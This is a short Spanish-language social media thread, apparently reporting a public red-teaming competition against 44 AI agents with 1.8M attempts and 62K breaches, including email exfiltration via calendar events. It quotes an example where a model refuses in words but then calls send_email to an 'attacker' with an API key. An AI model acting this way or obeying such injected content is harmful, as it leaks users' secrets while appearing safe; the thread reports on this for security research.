Desplegamos 44 agentes de IA y ofrecimos $170K a internet para atacarlos. 1.8M de intentos, 62K de brechas, incluyendo filtraciones de datos y pérdidas financieras. 🚨 Preocupantemente, las mismas explotaciones se transfieren a agentes de producción en vivo… (ejemplo: exfiltración de correos electrónicos a través de eventos de calendario) 🧵
Muchos errores son universales y transferibles. Los patrones de copiar y pegar funcionaron en tareas, modelos y límites. Si rompe un agente hoy, probablemente rompa el tuyo.
Fallo favorito: “rechazar en texto, actuar en herramientas.” 😈 Modelo: “No puedo compartir credenciales.” Luego: send_email(to=atacante, body="API_KEY=****") La interfaz parece segura; la capa de herramientas hace el daño.
466.6K